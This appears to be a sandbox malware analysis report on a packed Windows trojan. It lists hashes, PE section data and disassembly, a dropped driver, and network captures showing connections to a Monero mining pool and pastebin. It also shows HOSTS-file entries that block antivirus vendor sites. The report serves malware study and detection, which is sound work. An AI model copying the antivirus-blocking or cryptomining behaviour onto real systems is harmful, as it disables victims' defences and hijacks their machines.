SSDEEP:	48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
MD5:	7B1D6A1E1228728A16B66C3714AA9A23
SHA1:	8B59677A3560777593B1FA7D67465BBD7B3BC548
SHA-256:	3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
SHA-512:	573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

C:\Windows\Temp\__PSScriptPolicyTest_00cy0hkb.aka.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_d0431uio.kok.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_qxgkd3p5.vd1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ripwaavn.dne.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\pjjtwoljkwri.sys

Download File

Process:	C:\ProgramData\GoogleUP\Chrome\Updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Yf4yviDxwF.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, Detection: malicious, Browse Filename: prog.exe, Detection: malicious, Browse Filename: T52Z708x2p.exe, Detection: malicious, Browse Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse Filename: Us051y7j25.exe, Detection: malicious, Browse Filename: bypass.exe, Detection: malicious, Browse Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse Filename: Q3Vq6yp33F.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.948453468363114
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
File size:	6'031'872 bytes
MD5:	c441be4f7fd0f07fdcf94657c624c3da
SHA1:	bedd1f5d2feb959599b370590f62f02cbb3d2d3f
SHA256:	47c6484dde4d9ca23a7667b1b71c5ed88d7cdd3dccf57485333ceda0153e5684
SHA512:	c753bfa2b84ea5dfc47dbe25b807af6dd7d79e53a780ef693052f0c5c774767ef5b277671b07c539132af11a56546de3dd18790ce3fb3c4f66ca63c6c17fd8ad
SSDEEP:	98304:wKDlzK2disEKWIAN9rDUQ60m+E+3syUSIkJEhxfAF8p4ucxJixyWB5TU7NTJN1uy:waFbErIYeQ3nEIsyU2Y48CBh5TjY
TLSH:	375633487AC581F5C00CC7B4A573A43CB4787FD6E4998E0BB1DA7A326DF1058AE376A4
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Z{.f.........."......$....S................@......................................\...`........................................

File Icon


Icon Hash:	2830203058487819

Static PE Info

General

Entrypoint:	0x140ad1495
Entrypoint Section:	.vmp
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F17B5A [Mon Sep 23 14:29:46 2024 UTC]
TLS Callbacks:	0x40a36ce4, 0x1, 0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4def7148f41037b3bc9c17dcf019fe56

Entrypoint Preview

Instruction
call 00007F6F2C98C661h
lds ecx, fword ptr [edi]
mov dword ptr [D9076EFCh], eax
pop es
mov edi, FEB90FCFh
jns 00007F6F2CE6D68Ch
jo 00007F6F2CE6D641h
loopne 00007F6F2CE6D5F5h
mov bh, DEh
adc byte ptr [ebp+4Fh], al
xor byte ptr [ecx], 00000040h
adc dword ptr [edi+66h], FFFFFFFAh
loopne 00007F6F2CE6D637h
iretd
inc edx
push ecx
and byte ptr [ebx], bl
pop edi
push cs
adc dh, byte ptr [eax]
in eax, 9Fh
xor bl, byte ptr [ecx+39F44BD8h]
pop ecx
loopne 00007F6F2CE6D5B1h
jmp far B7E9h : CBA5BE52h
add al, 53h
ret
sahf
push esi
jbe 00007F6F2CE6D636h
shr al, cl
push esp
pop esp
daa
sub byte ptr [edx+5F54E845h], dh
mov cl, BCh
jmp far edx
pop es
js 00007F6F2CE6D5D7h
push ebx
jmp esp
retf 6CC6h
int3
shl byte ptr [ebx+54E89167h], 0000005Fh
add al, 22h
dec ebp
cmp ebp, FFFFFFC5h
push ebx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa09498	0x50	.vmp
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb3d000	0x3bf2c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb3a5d0	0x324	.vmp
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb3b000	0x1554	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa13c08	0x28	.vmp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb3a490	0x138	.vmp
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5b4000	0x58	.vmp
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x122b6	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x14000	0x321c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x4fe348	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x517000	0x198	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x518000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x519000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x51a000	0x9912b	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp	0x5b4000	0x4e8	0x600	d0d88a2ea53e43fa52a427961e0fb3b2	False	0.036458333333333336	data	0.18515094771187104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x5b5000	0x5858f4	0x585a00	318a16d0de3094f38f2c54d97d4fc148	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xb3b000	0x1554	0x1600	34ba70947daba9185b6754ebb04accd6	False	0.19122869318181818	data	5.424451497220812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xb3d000	0x3bf2c	0x39000	d966f51f14f7096e0aa35ca95576b234	False	0.5369980126096491	data	5.841488603454305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb75e50	0x134	data			0.04220779220779221
RT_CURSOR	0xb75f88	0xb4	data			0.1
RT_CURSOR	0xb76040	0x134	empty			0
RT_CURSOR	0xb76178	0x134	empty			0
RT_CURSOR	0xb762b0	0x134	empty			0
RT_CURSOR	0xb763e8	0x134	empty			0
RT_CURSOR	0xb76520	0x134	empty			0
RT_CURSOR	0xb76658	0x134	empty			0
RT_CURSOR	0xb76790	0x134	empty			0
RT_CURSOR	0xb768c8	0x134	empty			0
RT_CURSOR	0xb76a00	0x134	empty			0
RT_CURSOR	0xb76b38	0x134	empty			0
RT_CURSOR	0xb76c70	0x134	empty			0
RT_CURSOR	0xb76da8	0x134	empty			0
RT_CURSOR	0xb76ee0	0x134	empty			0
RT_CURSOR	0xb77018	0x134	empty			0
RT_BITMAP	0xb77150	0x666	empty			0
RT_ICON	0xb3dd00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.6979362101313321
RT_ICON	0xb3eda8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384			0.4716580066131318
RT_ICON	0xb42fd0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536			0.3224151188927008
RT_ICON	0xb537f8	0x9bcb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9981947195546975
RT_ICON	0xb5d3c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.6468105065666041
RT_ICON	0xb5e470	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216			0.5803941908713693
RT_ICON	0xb60a18	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384			0.5516650921114785
RT_ICON	0xb64c40	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536			0.48822903111321425
RT_DIALOG	0xb777b8	0xb4	empty			0
RT_DIALOG	0xb77870	0x120	empty			0
RT_DIALOG	0xb77990	0x118	empty			0
RT_DIALOG	0xb77aa8	0x202	empty			0
RT_DIALOG	0xb77cb0	0xf8	empty			0
RT_DIALOG	0xb77da8	0xa0	empty			0
RT_DIALOG	0xb77e48	0xee	empty			0
RT_DIALOG	0xb77f38	0xb4	empty			0
RT_DIALOG	0xb77ff0	0x120	empty			0
RT_DIALOG	0xb78110	0x118	empty			0
RT_DIALOG	0xb78228	0x202	empty			0
RT_DIALOG	0xb78430	0xf8	empty			0
RT_DIALOG	0xb78528	0xa0	empty			0
RT_DIALOG	0xb785c8	0xee	empty			0
RT_DIALOG	0xb786b8	0xa0	empty			0
RT_DIALOG	0xb78758	0x10c	empty			0
RT_DIALOG	0xb78868	0x104	empty			0
RT_DIALOG	0xb78970	0x1ee	empty			0
RT_DIALOG	0xb78b60	0xe4	empty			0
RT_DIALOG	0xb78c48	0x8c	empty			0
RT_DIALOG	0xb78cd8	0xda	empty			0
RT_MESSAGETABLE	0xb75468	0x74c	Matlab v4 mat-file (little endian) T, text, rows 200, columns 225, imaginary	English	United States	0.30085653104925053
RT_GROUP_CURSOR	0xb78db8	0x22	empty			0
RT_GROUP_CURSOR	0xb78de0	0x14	empty			0
RT_GROUP_CURSOR	0xb78df8	0x14	empty			0
RT_GROUP_CURSOR	0xb78e10	0x14	empty			0
RT_GROUP_CURSOR	0xb78e28	0x14	empty			0
RT_GROUP_CURSOR	0xb78e40	0x14	empty			0
RT_GROUP_CURSOR	0xb78e58	0x14	empty			0
RT_GROUP_CURSOR	0xb78e70	0x14	empty			0
RT_GROUP_CURSOR	0xb78e88	0x14	empty			0
RT_GROUP_CURSOR	0xb78ea0	0x14	empty			0
RT_GROUP_CURSOR	0xb78eb8	0x14	empty			0
RT_GROUP_CURSOR	0xb78ed0	0x14	empty			0
RT_GROUP_CURSOR	0xb78ee8	0x14	empty			0
RT_GROUP_CURSOR	0xb78f00	0x14	empty			0
RT_GROUP_CURSOR	0xb78f18	0x14	empty			0
RT_GROUP_ICON	0xb75bb8	0x3e	data			0.8225806451612904
RT_GROUP_ICON	0xb75bf8	0x3e	data			0.8709677419354839
RT_MANIFEST	0xb75c38	0x216	ASCII text, with CRLF line terminators			0.5411985018726592

Imports

DLL	Import
msvcrt.dll	__C_specific_handler
KERNEL32.dll	DeleteCriticalSection
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 18:38:32.428008080 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:32.433506012 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:32.433579922 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:32.433886051 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:32.439171076 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.300201893 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.300621986 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.301445007 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:33.301445007 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:33.310288906 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.654264927 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.654278994 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.654284000 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.654660940 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:33.654783964 CET	10343	49786	54.37.137.114	192.168.2.10
Oct 27, 2024 18:38:33.657748938 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:33.657788992 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:33.657876015 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:33.670241117 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:33.670264959 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:33.707640886 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:34.289285898 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.290539026 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.290574074 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.291970968 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.292047977 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.293878078 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.293947935 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.294015884 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.294023037 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.348140955 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.928608894 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.928877115 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.928934097 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.942436934 CET	49793	443	192.168.2.10	104.20.4.235
Oct 27, 2024 18:38:34.942464113 CET	443	49793	104.20.4.235	192.168.2.10
Oct 27, 2024 18:38:34.943783998 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:34.943820953 CET	49786	10343	192.168.2.10	54.37.137.114
Oct 27, 2024 18:38:34.944581032 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:34.950071096 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:34.950141907 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:34.997967005 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:35.003812075 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:35.782599926 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:35.782728910 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:35.782881021 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:35.791054964 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:35.796680927 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:36.032531023 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:36.032548904 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:36.032715082 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:36.053983927 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:36.102976084 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:40.521090984 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:40.691860914 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:38:50.520111084 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:38:50.566945076 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:39:00.433459997 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:39:00.488790035 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:39:10.537791014 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:39:10.582901001 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:39:20.616705894 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:39:20.676812887 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:39:30.638392925 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:39:30.692203999 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:39:41.603806019 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:39:41.645180941 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:02.109477997 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:02.161123037 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:12.143836975 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:12.192157030 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:22.147964001 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:22.207672119 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:32.130053043 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:32.176441908 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:45.161647081 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:45.207761049 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:40:55.147797108 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:40:55.192291975 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:05.200032949 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:05.254585028 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:15.170387983 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:15.223418951 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:25.220628023 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:25.270385981 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:35.322622061 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:35.364037037 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:45.168117046 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:45.223443031 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:41:55.265736103 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:41:55.317190886 CET	49804	10343	192.168.2.10	51.89.23.91
Oct 27, 2024 18:42:22.262274981 CET	10343	49804	51.89.23.91	192.168.2.10
Oct 27, 2024 18:42:22.317323923 CET	49804	10343	192.168.2.10	51.89.23.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 18:38:32.415003061 CET	58527	53	192.168.2.10	1.1.1.1
Oct 27, 2024 18:38:32.423281908 CET	53	58527	1.1.1.1	192.168.2.10
Oct 27, 2024 18:38:33.498445034 CET	52393	53	192.168.2.10	1.1.1.1
Oct 27, 2024 18:38:33.656609058 CET	53	52393	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 27, 2024 18:38:32.415003061 CET	192.168.2.10	1.1.1.1	0x575e	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:33.498445034 CET	192.168.2.10	1.1.1.1	0xcb6	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 18:38:15.162760019 CET	1.1.1.1	192.168.2.10	0xb42a	No error (0)	shed.dual-low.s-part-0039.t-0009.t-msedge.net	s-part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 27, 2024 18:38:15.162760019 CET	1.1.1.1	192.168.2.10	0xb42a	No error (0)	s-part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		141.94.23.83	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		51.15.193.130	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		146.59.154.106	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		54.37.232.103	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		212.47.253.124	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		51.15.65.182	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		54.37.137.114	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		51.15.58.224	A (IP address)	IN (0x0001)	false
Oct 27, 2024 18:38:32.423281908 CET	1.1.1.1	192.168.2.10	0x575e	No error (0)	xmr-eu1.nanopool.org		162.19.224.121	A (IP address)	IN (0x0001)	false
